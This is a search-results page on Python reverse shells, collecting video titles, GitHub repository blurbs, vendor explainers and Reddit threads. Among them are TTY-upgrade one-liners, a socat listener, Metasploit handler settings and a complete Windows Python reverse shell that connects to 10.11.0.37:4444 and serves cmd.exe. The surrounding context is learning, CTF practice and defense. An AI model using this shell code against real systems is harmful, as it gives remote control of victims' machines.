Brave Search

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server.

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.

Videos

05:47

YouTube

Breaking Down a Python Reverse Shell Like You’re 5! - YouTube

July 8, 2025

07:29

YouTube

Python Reverse Shell Tutorial - 10 - Displaying All Current ...

Python Reverse Shell Tutorial - 9 - Creating a Custom Interactive ...

December 21, 2015

youtube.com

Cómo CREAR una REVERSE SHELL con PYTHON ...

youtube.com

- YouTube

youtube.com

Reverse Shell Listener with PYTHON | Like NetCat

View all

GitHub

github.com › medpaf › reverse-shell

GitHub - medpaf/reverse-shell: Simple reverse shell written in Python. · GitHub

Simple reverse shell written in Python. Contribute to medpaf/reverse-shell development by creating an account on GitHub.

Author medpaf

Imperva

imperva.com › home › appsec › reverse shell

What Is a Reverse Shell | Examples & Prevention Techniques | Imperva

December 20, 2023 - In a standard remote shell attack, attackers connect a machine they control to the target’s remote network host, requesting a shell session. This tactic is known as a bind shell. Attackers can use a reverse shell if a remote host is not publicly accessible (i.e., due to firewall protection or a non-public IP).

Invicti

invicti.com › learn › reverse-shell

Reverse Shell

These are commonly referred to as remote shells and can be used for legitimate administration tasks, but also potentially abused by attackers. In a traditional remote access scenario, the user’s machine acts as a client and the target machine listens as a server. The user initiates the connection, for example by connecting to an SSH service. A reverse shell inverts this model.

GitHub

github.com › nicholasaleks › reverse-shells

GitHub - nicholasaleks/reverse-shells: A collection of reverse shell commands and payloads · GitHub

or use socat binary to get a fully tty reverse shell · socat file:`tty`,raw,echo=0 tcp-listen:12345 · Spawn a TTY shell from an interpreter · /bin/sh -i python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c "__import__('pty').spawn('/bin/bash')" python3 -c "__import__('subprocess').call(['/bin/bash'])" perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; perl -e 'print `/bin/bash`' ruby: exec "/bin/sh" lua: os.execute('/bin/sh') vi: :!bash ·

Starred by 50 users

Forked by 11 users

GitHub

github.com › trackmastersteve › shell

GitHub - trackmastersteve/shell: Python 3 Reverse Shell · GitHub

You can take advantage of post exploitation modules in Metasploit by using: exploit/multi/handler set PAYLOAD linux/shell_reverse_tcp windows/shell_reverse_tcp etc.

Starred by 26 users

Forked by 15 users

Languages Python

Find elsewhere

Google Bing Mojeek

Medium

medium.com › @kiptryin › reverse-shells-101-gaining-shell-access-with-python-and-bash-61faf539a822

Reverse Shells 101: Gaining Shell Access with Python and Bash | by Kiptryin | Medium

July 28, 2025 - After the command runs on the target machine, a reverse shell will appear in your Netcat listener. You can the command python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ to upgrade a basic reverse shell (like one received via a Python payload) to a fully interactive Bash shell as shown below.

reddit.com › r/python › python reverse shell for unix systems

r/Python on Reddit: Python reverse shell for unix systems

May 19, 2022 -

https://github.com/sectasy0/reshell.py

Top answer

1 of 4

(@rockstar: I think you and I are studying the same thing!)

Not a one liner, but learning from David Cullen's answer, I put together this reverse shell for Windows.

import os,socket,subprocess,threading;
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.37",4444))

p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

If anybody can condense this down to a single line, please feel free to edit my post or adapt this into your own answer...

2 of 4

From the documentation for socket.fileno():

Under Windows the small integer returned by this method cannot be used where a file descriptor can be used (such as os.fdopen()). Unix does not have this limitation.

I do not think you can use os.dup2() on the return value of socket.fileno() on Windows unless you are using Cygwin.

I do not think you can do this as a one-liner on Windows because you need a while loop with multiple statements.

reddit.com › r/python › phantom - a multi-platform http(s) reverse shell server and client in python 3

r/Python on Reddit: Phantom - A multi-platform HTTP(S) Reverse Shell Server and Client in Python 3

November 26, 2021 -

Phantom is a multi-platform HTTP(S) Reverse Shell server and client in Python 3. Binaries for Linux and Windows platforms can be built through an embedded script that executes PyInstaller.

Reverse shells can be established through HTTP or HTTPS. The certificates used for HTTPS can be auto-generated by Phantom or supplied by the user.

Phantom includes a helper shell script that enables fast generation of self-signed certificates for use of both servers and clients. After generation, the server and certificate authority certificates required for encrypted connections are bundled in the binaries for portability and ease of execution.

Check it out on GitHub at https://github.com/EONRaider/BCA-Phantom